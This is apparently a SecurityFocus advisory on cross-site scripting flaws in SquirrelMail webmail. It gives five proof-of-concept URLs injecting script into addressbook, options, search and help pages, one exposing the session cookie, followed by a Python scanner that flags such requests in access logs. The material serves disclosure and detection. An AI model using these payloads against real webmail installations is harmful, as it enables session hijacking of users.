SquirrelMail Multiple Cross Site Scripting Vulnerabilities

The following proofs of concept have been provided by DarC KonQuesT:

http://<VULNERABLE SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</script><!--

http://<VULNERABLE SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>

http://<VULNERABLE SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&what=x&where=BODY&submit=Search

http://<VULNERABLE SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('boop!')</script>&submit=Search

http://<VULNERABLE SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
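
For log review, the following added example (not part of the original advisory and not SquirrelMail code) flags web-server access-log entries in which one of the scripts and parameters listed above carries HTML markup, including percent-encoded and double-encoded forms. The log format (Apache-style combined log), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Scripts and parameters taken from the proof-of-concept URLs on this page.
# None = markup sits directly in the query string, with no parameter name.
WATCHED = {"addressbook.php": [None], "options.php": ["optpage"],
           "search.php": ["mailbox", "where"], "help.php": ["chapter"]}
MARKUP = re.compile(r'[<>"]')   # characters that let a value break out into HTML
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded markup is seen."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def suspicious_params(target):
    """Return the watched parameters of one request target that carry markup."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    hits = []
    for name in WATCHED.get(script, []):
        if name is None:
            if MARKUP.search(decode(parts.query)):
                hits.append("<raw query>")
            continue
        for pair in parts.query.split("&"):
            key, _, val = pair.partition("=")
            if decode(key) == name and MARKUP.search(decode(val)):
                hits.append(name)
    return hits

def scan(log_lines):
    """Return (request target, flagged parameters) for each matching log line."""
    found = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and (hits := suspicious_params(m.group(1))):
            found.append((m.group(1), hits))
    return found

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /webmail/src/search.php?mailbox=INBOX&what=x&where=BODY&submit=Search HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /webmail/src/help.php?chapter=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /webmail/src/options.php?optpage=%253Cscript%253E HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /webmail/src/addressbook.php?%22%3E%3Cscript%3E HTTP/1.1" 200 2048',
]
```

The search.php `what` parameter is deliberately not watched, because it is free-text search input and does not appear as an injection point in the URLs above.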


 

Copyright 2010, SecurityFocus